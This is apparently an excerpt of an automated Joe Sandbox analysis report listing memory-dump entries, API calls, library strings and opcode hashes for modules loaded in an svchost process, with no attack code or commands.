                                                                                                                                                                                • VirtualQuery failed for %d bytes at address %p, xrefs: 6828CCBA
                                                                                                                                                                                • Address %p has no image-section, xrefs: 6828CCD0
                                                                                                                                                                                • VirtualProtect failed with code 0x%x, xrefs: 6828CB87, 6828CCA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual$ProtectQuery__iob_func$ErrorLastabortfwritevfprintf
                                                                                                                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                                                • API String ID: 1410914397-2123141913
                                                                                                                                                                                • Opcode ID: 1bcbf0463df2902804f244ba17fbc2bc3bc8facc4f6f4ae605d0373589f2a974
                                                                                                                                                                                • Instruction ID: 28193cdc276a77dbff1e66af2352926131b6c841eac6018483d9ac58c2c1b0f4
                                                                                                                                                                                • Opcode Fuzzy Hash: 1bcbf0463df2902804f244ba17fbc2bc3bc8facc4f6f4ae605d0373589f2a974
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F5105B7705B8996EF128B26EC547593B21FB46FA4F88822ACF5D03394DF69D54AC300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupfree
                                                                                                                                                                                • String ID: Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY $Select failed$]
                                                                                                                                                                                • API String ID: 1865132094-505596619
                                                                                                                                                                                • Opcode ID: 82d691928a97477026fb041874ac851d40ab4502b2152f25add78d9e2f3d26e9
                                                                                                                                                                                • Instruction ID: b9a1433e523c92c2e04e410ccbe20424ee0b86822c800123095ed56506977245
                                                                                                                                                                                • Opcode Fuzzy Hash: 82d691928a97477026fb041874ac851d40ab4502b2152f25add78d9e2f3d26e9
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C518552E0DA5282FA649B1D98B13BA2795AF4C7C4F4D0031DF9F47281EF2CEA538349
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
                                                                                                                                                                                • API String ID: 909987262-2189586557
                                                                                                                                                                                • Opcode ID: 652a251f659831d53cb70f2cd5db8896ae08ac9ded6e234a37f5af66a2b5649c
                                                                                                                                                                                • Instruction ID: a2a89ecf1c9838e98ee91ef899788aa74d095c69908db2edc2125d47b6b5352c
                                                                                                                                                                                • Opcode Fuzzy Hash: 652a251f659831d53cb70f2cd5db8896ae08ac9ded6e234a37f5af66a2b5649c
                                                                                                                                                                                • Instruction Fuzzy Hash: 72410B12F0B686A6EA249F69D5044BD6791EF61BC4F984032DE4D077D4EE6CE743E300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorIoctlLastsendsetsockopt
                                                                                                                                                                                • String ID: Send failure: %s$send(len=%zu) -> %d, err=%d
                                                                                                                                                                                • API String ID: 2224487826-343019339
                                                                                                                                                                                • Opcode ID: 95ac13846f69346a0b928e71d280ca147f1483bf8661b5176d7a62ce10b46b43
                                                                                                                                                                                • Instruction ID: d26e269c776c6615a747940491bf77f25adae977d328a561983e4d5b32606699
                                                                                                                                                                                • Opcode Fuzzy Hash: 95ac13846f69346a0b928e71d280ca147f1483bf8661b5176d7a62ce10b46b43
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F518272A08B8586EB618F29E4417AAB3A0FB89BD4F544131DF8D07755EF3CD186CB04
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freememmove$malloc
                                                                                                                                                                                • String ID: No MQTT topic found. Forgot to URL encode it?$Too long MQTT topic
                                                                                                                                                                                • API String ID: 531908557-1276830682
                                                                                                                                                                                • Opcode ID: 2a74a00932890c42b2f5e828185754ff496c82433251d1438c42eaa71d5c27e0
                                                                                                                                                                                • Instruction ID: 4f97d94ace95e483151325395e20d6e394b9bdbbdfbf5880f3e32d69d02caed0
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a74a00932890c42b2f5e828185754ff496c82433251d1438c42eaa71d5c27e0
                                                                                                                                                                                • Instruction Fuzzy Hash: B341E062A0C69286EB019F19A4402B96B91EB897D4F8C4136EF9E077D5CF2CE507C714
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: isalphamalloc$isalnum
                                                                                                                                                                                • String ID: iso
                                                                                                                                                                                • API String ID: 2831391162-1633189697
                                                                                                                                                                                • Opcode ID: 379039d3c6cd4022b394262d792753cea32b5fb76a50e5e8bc0dc4f44bcb7480
                                                                                                                                                                                • Instruction ID: 4d61cd036929f077c3b3353bd730b2f175edf52a7f4f44be370ff802bb0db5f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 379039d3c6cd4022b394262d792753cea32b5fb76a50e5e8bc0dc4f44bcb7480
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C316DE270969986EE05DF26A81836A7B91FB447D4F888425EE6D43390EF39C04EC300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                • String ID: Negative width.$Number is too big.
                                                                                                                                                                                • API String ID: 3237623162-1861685508
                                                                                                                                                                                • Opcode ID: 5d1dca2863d5a5341a9bedecaee8ab009789f318b56cfe694f6e2983c3987148
                                                                                                                                                                                • Instruction ID: d5002ebf88a893f5e0587ebf232dae0051ea98f075c943f9b6c86444bb8a4b13
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d1dca2863d5a5341a9bedecaee8ab009789f318b56cfe694f6e2983c3987148
                                                                                                                                                                                • Instruction Fuzzy Hash: FA31C36290E2C76FE30ABF3880261BD3B64DF42BC4F54C8B5DB8942593ED1D6A50E310
                                                                                                                                                                                APIs
                                                                                                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF8B83C262C), ref: 00007FF8B83C0220
                                                                                                                                                                                  • Part of subcall function 00007FF8B8382C00: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8382C32
                                                                                                                                                                                  • Part of subcall function 00007FF8B8382C00: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8382CD6
                                                                                                                                                                                  • Part of subcall function 00007FF8B8382C00: memmove.VCRUNTIME140 ref: 00007FF8B8382CEE
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF8B83C262C), ref: 00007FF8B83C025A
                                                                                                                                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF8B83C262C), ref: 00007FF8B83C02AA
                                                                                                                                                                                • CertCloseStore.CRYPT32 ref: 00007FF8B83C02C3
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF8B83C262C), ref: 00007FF8B83C02CD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freemalloc$CertCloseStore_strdupcallocmemmove
                                                                                                                                                                                • String ID: tls:schannel:cert:share
                                                                                                                                                                                • API String ID: 875829341-3013479560
                                                                                                                                                                                • Opcode ID: 4e66f9d35bde16e6c7920f20767a852549c905b4a87e36f0d399023fe61f0e8a
                                                                                                                                                                                • Instruction ID: f0bd86582aafc09005a1b6ad6d9e7b0c220850af7415baab7ba104d2b975afa1
                                                                                                                                                                                • Opcode Fuzzy Hash: 4e66f9d35bde16e6c7920f20767a852549c905b4a87e36f0d399023fe61f0e8a
                                                                                                                                                                                • Instruction Fuzzy Hash: 77314926A1AB8281EA518F1AE4501AA73A0FF8CBC4F0C5135DF4D17B59DF3CE5468748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: fwrite$fputc
                                                                                                                                                                                • String ID: \n"
                                                                                                                                                                                • API String ID: 3035207039-3036219659
                                                                                                                                                                                • Opcode ID: aff7e1ade1b1192a5d6e041f67333c9be9431c27d63b33d0e13f69c66444ecfa
                                                                                                                                                                                • Instruction ID: 352e68899e30be89c9a962ad9f721f9c2c874462d66f68af20ad35110a9dc9b3
                                                                                                                                                                                • Opcode Fuzzy Hash: aff7e1ade1b1192a5d6e041f67333c9be9431c27d63b33d0e13f69c66444ecfa
                                                                                                                                                                                • Instruction Fuzzy Hash: F81189C375845D0AFF25064BA8187BA55526B45FEAECC0123DE300FFC5DB1D85C68302
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strstr$isspacestrtoul
                                                                                                                                                                                • String ID: nplurals=$plural=
                                                                                                                                                                                • API String ID: 3315038182-2056099321
                                                                                                                                                                                • Opcode ID: 6264f5b93b0748ea755d693b6bcd5ac9787819e8d4ae902383adba19e62e673d
                                                                                                                                                                                • Instruction ID: ec123b898794b2c0b283e6d657f8ea5e096ae0f7326a8eedf6cd89533bd8616e
                                                                                                                                                                                • Opcode Fuzzy Hash: 6264f5b93b0748ea755d693b6bcd5ac9787819e8d4ae902383adba19e62e673d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C113BF331275A54EF018F22AA5036967A4BB047D9FC88126EEAE47384EF38C198C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                • Opcode ID: 3ce5e9542e6a15c50d01086448501f76df1a2c9eb63cb7e16f7a8384874a424b
                                                                                                                                                                                • Instruction ID: 9ec4630fcafdc168c2f9933fa1b43f9a3b0cc5d4bc3c0edeed0b9164e4e0bf0b
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ce5e9542e6a15c50d01086448501f76df1a2c9eb63cb7e16f7a8384874a424b
                                                                                                                                                                                • Instruction Fuzzy Hash: 3811D031B19A4196F3508F62E854329A6A0FB88FE0F040234EA5E83798EF7CEA04C754
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memchrmemmove$callocfree
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1632661588-0
                                                                                                                                                                                • Opcode ID: 67a429ddf5d6db7ca25f446b80fccfb129d69cf2a2ba561e12da3b285242d03a
                                                                                                                                                                                • Instruction ID: 191658c2a231eb1f394e55748192919eef1618fe1cf0d8fbd546bf74437f5694
                                                                                                                                                                                • Opcode Fuzzy Hash: 67a429ddf5d6db7ca25f446b80fccfb129d69cf2a2ba561e12da3b285242d03a
                                                                                                                                                                                • Instruction Fuzzy Hash: 355100A6B09B9585EA019B5AA5046B96B95FB09BCAF0C8831DF4D07B95DF3CE443C30C
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 521d6d99afc2a803f99f51ebb60df230eaf899fbebfa0aeada4cdac74f9e8e75
                                                                                                                                                                                • Instruction ID: 5402bba18cb473094dbcb0376ed716b2f58c21262ece251409f719ac131e4eb6
                                                                                                                                                                                • Opcode Fuzzy Hash: 521d6d99afc2a803f99f51ebb60df230eaf899fbebfa0aeada4cdac74f9e8e75
                                                                                                                                                                                • Instruction Fuzzy Hash: B6116236509A81C2D7489F69E9940FD33A4FB8DFE9F480035DF594A718CF3890968725
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strstr
                                                                                                                                                                                • String ID: $0123456789-$<DIR>$APM0123456789:
                                                                                                                                                                                • API String ID: 1392478783-1610072840
                                                                                                                                                                                • Opcode ID: 857d600fe8138a881e53180f953508fadf0b9ce6037ab25d53c060ed86e9f454
                                                                                                                                                                                • Instruction ID: 0fd340aa4d55a2a6ace956169a5d34fa9da54a2c73a5bbd2e54bd7bb181c4adc
                                                                                                                                                                                • Opcode Fuzzy Hash: 857d600fe8138a881e53180f953508fadf0b9ce6037ab25d53c060ed86e9f454
                                                                                                                                                                                • Instruction Fuzzy Hash: 64B1837690D68686EB259F38D06437D7BA0EB19B88F1C8039DB4E46686DF7CE443C748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
